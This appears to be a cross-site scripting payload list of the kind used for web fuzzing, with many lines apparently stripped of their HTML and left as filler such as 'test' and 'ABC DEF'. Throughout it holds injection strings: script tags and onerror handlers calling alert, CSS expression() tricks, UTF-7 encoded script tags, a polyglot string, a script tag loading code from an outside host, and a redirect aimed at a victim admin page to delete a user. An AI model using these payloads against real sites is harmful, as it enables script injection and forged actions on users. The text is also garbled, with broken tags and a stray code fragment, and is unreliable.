'`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1)
\x3Cscript>javascript:alert(1) '"`> javascript:alert(1)javascript:alert(1)javascript:alert(1) -->
--> --> --> --> `"'>
test
test
test
test
test
test
test
test
test
test
test
test
test
test
"'`>ABC
DEF "'`>ABC
DEF '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
"`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
alert(1)0
"> "> foo=">"> foo=">
">
<% foo>
XXX
X
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXX
XXX
X
XXX
XXX / style=x:expression\28javascript:alert(1)\29>
X
X
X
X
XXX
XXX
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&
<
XSS
XSS
""","XML namespace."),("""
<IMG SRC="javascript:javascript:alert(1)">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
X
&&
javascript:alert(1);
]]
test1
test1
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> '';!--"
=&{()}
xxs link
xxs link
">
perl -e 'print "
";' > out
<
XSS
exp/*
¼script¾alert(¢XSS¢)¼/script¾
echo('
alert("XSS")'); ?>
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
X
|\>
''
X
http://www.
style="x:"> <--`
--!>
x ">
CLICKME
click
Click Me